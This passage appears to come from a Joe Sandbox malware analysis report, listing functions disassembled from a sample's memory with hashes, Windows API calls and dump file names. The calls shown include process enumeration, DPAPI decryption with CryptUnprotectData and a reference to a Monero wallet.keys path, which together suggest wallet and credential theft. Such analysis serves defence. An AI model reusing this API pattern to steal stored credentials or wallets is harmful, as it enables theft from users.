                              • Opcode ID: 51b0838871b41831c07d41da1856dce77a4e7b1238b030b864271d75d0df57c2
                              • Instruction ID: 0fc06d3d70c0a5815ae50562c6dd8734e8e19e3fe113ed838a5d719640a6bb69
                              • Opcode Fuzzy Hash: 51b0838871b41831c07d41da1856dce77a4e7b1238b030b864271d75d0df57c2
                              • Instruction Fuzzy Hash: 40B20AF3A0C2049FE3046E2DEC8577AB7E5EF94720F1A453DE6C5C3744EA3598058696
                              Function 00DBBB65 Relevance: 6.6, Strings: 4, Instructions: 1606COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: &mO:$J6M$Qsj$u}Ei
                              • API String ID: 0-3735752871
                              • Opcode ID: 242072a063c7a25a321a1ab9635ab71969325972c5dfb5c5f33b4a96594a975f
                              • Instruction ID: ebba6bc226297dc2136381d8d290c35afcd3e6b705ce14908ae33e5af3a49945
                              • Opcode Fuzzy Hash: 242072a063c7a25a321a1ab9635ab71969325972c5dfb5c5f33b4a96594a975f
                              • Instruction Fuzzy Hash: 84B228F390C304AFE304AE2DEC8567ABBE9EF94760F1A853DE6C487744E63558058792
                              Function 009F8680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 009FA740: lstrcpy.KERNEL32(00A00E17,00000000), ref: 009FA788
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00A005B7), ref: 009F86CA
                              • Process32First.KERNEL32(?,00000128), ref: 009F86DE
                              • Process32Next.KERNEL32(?,00000128), ref: 009F86F3
                                • Part of subcall function 009FA9B0: lstrlen.KERNEL32(?,013B8BA0,?,\Monero\wallet.keys,00A00E17), ref: 009FA9C5
                                • Part of subcall function 009FA9B0: lstrcpy.KERNEL32(00000000), ref: 009FAA04
                                • Part of subcall function 009FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009FAA12
                                • Part of subcall function 009FA8A0: lstrcpy.KERNEL32(?,00A00E17), ref: 009FA905
                              • CloseHandle.KERNEL32(?), ref: 009F8761
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                              • String ID:
                              • API String ID: 1066202413-0
                              • Opcode ID: 27061aadad9206bd3f93a866de587c2b9480e63e81fabaab1152f5e693ecefb1
                              • Instruction ID: 5a01bdda534bcc0ed866157596e670eb04d4549c0bb91f494d552fca52dbb260
                              • Opcode Fuzzy Hash: 27061aadad9206bd3f93a866de587c2b9480e63e81fabaab1152f5e693ecefb1
                              • Instruction Fuzzy Hash: 113168B190121CABCB24EF50DC45FEEB778EB85740F1081A9E20EA61A0DF706A45CFA1
                              Function 009F8EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                              Download Yara Rule
                              APIs
                              • CryptBinaryToStringA.CRYPT32(00000000,009E5184,40000001,00000000,00000000,?,009E5184), ref: 009F8EC0
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: BinaryCryptString
                              • String ID:
                              • API String ID: 80407269-0
                              • Opcode ID: 5bd8f33a1910718458b61c03af399150a3b8a3f69c7f3b6bd05a8a56387c83e2
                              • Instruction ID: 0d8631580d79214f528ce65f7c6fb3cdf85fc28f29e9045bcb97bc69044c002e
                              • Opcode Fuzzy Hash: 5bd8f33a1910718458b61c03af399150a3b8a3f69c7f3b6bd05a8a56387c83e2
                              • Instruction Fuzzy Hash: 17112A74210208FFDB40CF64D885FBB33A9AF89714F109848FA198B250DB75EC41DBA0
                              Function 009E9AC0 Relevance: 6.1, APIs: 4, Instructions: 55encryptionmemoryCOMMON
                              Download Yara Rule
                              APIs
                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,009E4EEE,00000000,00000000), ref: 009E9AEF
                              • LocalAlloc.KERNEL32(00000040,?,?,?,009E4EEE,00000000,?), ref: 009E9B01
                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,009E4EEE,00000000,00000000), ref: 009E9B2A
                              • LocalFree.KERNEL32(?,?,?,?,009E4EEE,00000000,?), ref: 009E9B3F
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: BinaryCryptLocalString$AllocFree
                              • String ID:
                              • API String ID: 4291131564-0
                              • Opcode ID: 4a59705ba9cad7263162e16c916f793eea1619ce4127912961646213cb7404d5
                              • Instruction ID: 3f63c88da2fd1e29988bc39a60c8605872a3323aa1d9b4e6a1ba5d9bc9905533
                              • Opcode Fuzzy Hash: 4a59705ba9cad7263162e16c916f793eea1619ce4127912961646213cb7404d5
                              • Instruction Fuzzy Hash: 7811A2B4240208BFEB10CF64DC95FAA77B9FB89700F208058FA159B3D0C7B6A941CB90
                              Function 009F7980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00A00E00,00000000,?), ref: 009F79B0
                              • RtlAllocateHeap.NTDLL(00000000), ref: 009F79B7
                              • GetLocalTime.KERNEL32(?,?,?,?,?,00A00E00,00000000,?), ref: 009F79C4
                              • wsprintfA.USER32 ref: 009F79F3
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateLocalProcessTimewsprintf
                              • String ID:
                              • API String ID: 377395780-0
                              • Opcode ID: 195ff4d5baea6eb599b25f54cbcdd4242a1b71a9d7d2fbffb243e269378a3d15
                              • Instruction ID: 26ce1d125b7e5685c4d2f2c6463d706e454385cf9a67de82806703cf58458ebe
                              • Opcode Fuzzy Hash: 195ff4d5baea6eb599b25f54cbcdd4242a1b71a9d7d2fbffb243e269378a3d15
                              • Instruction Fuzzy Hash: 861127B2914118ABCB24DFCADD45BBEB7F8FB4CB11F10421AF605A2680E7795941CBB1
                              Function 009F7A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,013BDFB0,00000000,?,00A00E10,00000000,?,00000000,00000000), ref: 009F7A63
                              • RtlAllocateHeap.NTDLL(00000000), ref: 009F7A6A
                              • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,013BDFB0,00000000,?,00A00E10,00000000,?,00000000,00000000,?), ref: 009F7A7D
                              • wsprintfA.USER32 ref: 009F7AB7
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                              • String ID:
                              • API String ID: 3317088062-0
                              • Opcode ID: 3972808bbea630eec38f0be94965f5f8a8b05670edfcaafc4d61fb002b7a87db
                              • Instruction ID: 0e4c841ec968b3dc5b48df46ae669487bc93e9a0f4ffa004ab0434f55c0a5d9a
                              • Opcode Fuzzy Hash: 3972808bbea630eec38f0be94965f5f8a8b05670edfcaafc4d61fb002b7a87db
                              • Instruction Fuzzy Hash: C8118EB1A45218EBEB208F94DC49FA9B778FB04721F10479AFA0A932C0D7745A41CF51
                              Function 00DB0104 Relevance: 5.4, Strings: 3, Instructions: 1662COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 2?/$\j[d$^:
                              • API String ID: 0-195109781
                              • Opcode ID: 078045ba41da9d7e4ab749d091dea316750743484ec884100e214b72e271ee73
                              • Instruction ID: eeffb436fed73f37a716e5f3280de3bb9ee6503ac23cd502dd73626efb8bb71c
                              • Opcode Fuzzy Hash: 078045ba41da9d7e4ab749d091dea316750743484ec884100e214b72e271ee73
                              • Instruction Fuzzy Hash: 0EB217B360C2049FE7046E29EC8567AFBE9EFD4720F1A853DE6C5C3740EA3598058697
                              Function 00DACA21 Relevance: 5.4, Strings: 3, Instructions: 1660COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: >pn$CsSo$CsSo
                              • API String ID: 0-315857674
                              • Opcode ID: 44559a53d6008c7fc4ded1b961b44d94f846f1375cacd6675439875850d7f144
                              • Instruction ID: 28ccd021e109175ab7116eeee35d9c86b5bb4d92c6e40718674a0d95f5ce83f2
                              • Opcode Fuzzy Hash: 44559a53d6008c7fc4ded1b961b44d94f846f1375cacd6675439875850d7f144
                              • Instruction Fuzzy Hash: 39B2F7F3A0C2049FE3046E2DEC8567AFBE9EB94720F1A463DEAC4C7744E93558058697
                              Function 00DB6DD4 Relevance: 5.1, Strings: 3, Instructions: 1397COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: $ =w$&wmn$Q:i
                              • API String ID: 0-1203201082
                              • Opcode ID: b771be9bc6d854b68dc6958bde1e2194a5254e64776c14f35cd8b613a72bf3d4
                              • Instruction ID: dbdfcb57cdb8012af770f0bce9aaa6fb5fbc35123adbb029cca4a977c131f6aa
                              • Opcode Fuzzy Hash: b771be9bc6d854b68dc6958bde1e2194a5254e64776c14f35cd8b613a72bf3d4
                              • Instruction Fuzzy Hash: CB92F5F3A0C2009FE304AE2DEC8567ABBE5EF94720F16493DEAC5C7344EA3558158697
                              Function 009F3720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                              Download Yara Rule
                              APIs
                              • CoCreateInstance.COMBASE(009FE118,00000000,00000001,009FE108,00000000), ref: 009F3758
                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 009F37B0
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ByteCharCreateInstanceMultiWide
                              • String ID:
                              • API String ID: 123533781-0
                              • Opcode ID: 4d3b20dd372a7040ccd8f52c6f16971dd5487d19e50ab86b61b6902c4533c284
                              • Instruction ID: 8b8b78e7035ef9dfeeeae86817322f66bb9eb20e2cd44263a5489651e16fea3a
                              • Opcode Fuzzy Hash: 4d3b20dd372a7040ccd8f52c6f16971dd5487d19e50ab86b61b6902c4533c284
                              • Instruction Fuzzy Hash: 1141D970A40A2C9FDB24DB58CC95BABB7B5BB48702F4081D8E609E72D0D7756E85CF50
                              Function 009E9B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                              Download Yara Rule
                              APIs
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 009E9B84
                              • LocalAlloc.KERNEL32(00000040,00000000), ref: 009E9BA3
                              • LocalFree.KERNEL32(?), ref: 009E9BD3
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
